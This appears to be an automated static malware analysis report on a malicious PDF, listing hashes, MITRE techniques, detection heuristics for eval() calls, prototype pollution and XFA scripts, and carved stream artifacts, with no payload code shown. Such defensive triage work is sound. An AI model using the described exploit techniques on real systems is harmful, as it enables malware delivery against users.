Malicious PDF — malware analysis report

Static analysis result for SHA-256 d0b0780cb055e2cf…

MALICIOUS

PDF

1.39 MB
MD5: e2362bd9fda2d68118b18f3a24e24c77 SHA-1: f04f490e1d6a55181366b9cdf203f08b339cc28f SHA-256: d0b0780cb055e2cf2f39a8b66e26810bc31942fd7b807f6382ff70ccc628cbac
126 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.007 JavaScript

The PDF file contains multiple embedded JavaScript streams, with one particularly large stream exhibiting eval() calls and prototype pollution patterns. This suggests the script is designed to de-obfuscate and execute malicious code. The presence of XFA forms and embedded scripts points towards a delivery mechanism for a secondary payload, though the exact nature of the payload cannot be determined from the static analysis alone. No specific IOCs like URLs or hashes were extracted from the script content.

Machine Learning

  • Nyx PDF Classifier suspicious score 0.3093

Heuristics 8

  • Prototype-pollution JavaScript pattern high CVE related PDF_JS_PROTOTYPE_POLLUTION
    PDF JavaScript mutates object prototypes while also referencing privileged or sensitive PDF APIs. This tracks a modern PDF exploit technique family without assigning an unverified CVE.
  • eval() call high PDF_EVAL
    eval() found — commonly used for obfuscated exploit execution (matched inside decoded stream)
  • Embedded script payload in PDF stream medium PDF_EMBEDDED_SCRIPT_PAYLOAD
    PDF stream bytes contain an HTML/XFA <script> tag without accompanying Windows shell-execution primitives — common in accessible XFA forms but worth surfacing for analyst review.
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • JavaScript action low PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules. (matched inside decoded stream)
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules. (matched inside decoded stream)
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://ns.adobe.com/xap/1.0/
    • http://ns.adobe.com/pdf/1.3/
    • http://ns.adobe.com/xap/1.0/mm/
    • http://purl.org/dc/elements/1.1/
    • http://ns.adobe.com/xfa/promoted-desc/

Extracted artifacts 19

Files carved from inside the sample during analysis.

FilenameKindSourceSize
stream_002_off0000034e.js
f8721569904600df33f536ddc9f4942717077f9d6c3c4253a8f4de5650fc6531		 decompressed-pdf-stream PDF FlateDecoded stream at offset 0x34E 1367 bytes
stream_003_off00000534.js
91ea259764c68d27b8981a339c02d8ea92224ae5c0d0cd0a7c8f3d645d599090		 decompressed-pdf-stream PDF FlateDecoded stream at offset 0x534 902 bytes
stream_008_off00000e6b.js
6e568a1338babb171f964d835d60a1f5c1d9527ce6987e21aca56a3e3e4b9cc0		 decompressed-pdf-stream PDF FlateDecoded stream at offset 0xE6B 2423 bytes
stream_009_off00001239.js
49fbb9f080ff25fd35b7d18defa8b4d883eb91f369cb60256610528f5be308f8		 decompressed-pdf-stream PDF FlateDecoded stream at offset 0x1239 1019156 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s). Carved artifact contains 4 long base64-like blob(s).
stream_010_off00036f05.bin
b16a77f36a1dbb10b68158d5bc3bc5894c1696984d4fcfb18db002aa5ca6cb65		 decompressed-pdf-stream PDF FlateDecoded stream at offset 0x36F05 5711 bytes
stream_011_off0003737d.bin
cac9c34aeab80f505296f22cac62dc239a5cea1ffae6361d1991c279d415fadb		 decompressed-pdf-stream PDF FlateDecoded stream at offset 0x3737D 47559 bytes
stream_012_off0003833f.bin
8ed9cdaaef2aa769579a4ba835e39256b1c3971f55aa85f7b7c268d675cc53f7		 decompressed-pdf-stream PDF FlateDecoded stream at offset 0x3833F 8178 bytes
stream_013_off00038a98.bin
82883b1c356644ec1217b1e20b594e85f02d0657b4324c7bfe032e52e5e13b8e		 decompressed-pdf-stream PDF FlateDecoded stream at offset 0x38A98 374 bytes
stream_015_off0003aa7e.bin
04d0c9976d81c8ac08186397a6e1b0eda7a6896713d9d7591343b1b07999ec47		 decompressed-pdf-stream PDF FlateDecoded stream at offset 0x3AA7E 895200 bytes
stream_023_off0008cfdb.bin
b2a50460b1fc66b7680230c728241859435e1af538bd15e880282e123198de62		 decompressed-pdf-stream PDF FlateDecoded stream at offset 0x8CFDB 102219 bytes
stream_024_off0009e950.bin
f13c106e4ee427254e92d68485d1420403c9e874eee0f33787ff10fe62f8018f		 decompressed-pdf-stream PDF FlateDecoded stream at offset 0x9E950 188972 bytes
stream_025_off000be59b.bin
55cb4b903a99e15bba7a1da6ca466776cafcadab161604e20e685e4472952dcf		 decompressed-pdf-stream PDF FlateDecoded stream at offset 0xBE59B 196605 bytes
stream_026_off000df735.bin
b8e2518b116c26bab0e9f8c1672daf405dedad561157502b657e9005be2029aa		 decompressed-pdf-stream PDF FlateDecoded stream at offset 0xDF735 367087 bytes
stream_028_off00130dd2.bin
1e8564d3d89047875dccaa98279599de9d7ddf77240906041f1156ba8edf3315		 decompressed-pdf-stream PDF FlateDecoded stream at offset 0x130DD2 352198 bytes
objstm_0067_00.bin
fe1b0511b757619b151d5ed2d12acf276d811f46e18d3442c1f9a1daec32b1e0		 pdf-objstm-decoded PDF /ObjStm 67 0 obj (inflated) 807 bytes
font_00_sfnt_off0004990d.bin
c29e5b1537bee8c88b3ffca56c5f24a45ec8da374cf9d4c0b4a78d04fc230949		 pdf-font-stream PDF embedded font (sfnt) at offset 0x4990D 95975 bytes
font_01_sfnt_off00059bf2.bin
4f8a962143becce891b0f8d40b5315e54e2a298ba661302850ebd34e48af909a		 pdf-font-stream PDF embedded font (sfnt) at offset 0x59BF2 99778 bytes
font_02_sfnt_off0006aead.bin
b1260c85fef77007b5f19c1c6f3552e1c6ade6c959082cf86dd6971951ed119c		 pdf-font-stream PDF embedded font (sfnt) at offset 0x6AEAD 102071 bytes
font_03_sfnt_off0007c8c5.bin
926d8eb5abd4c74e46a419aaf25a490564d389c7a250d2392b198a342df65b8a		 pdf-font-stream PDF embedded font (sfnt) at offset 0x7C8C5 97320 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.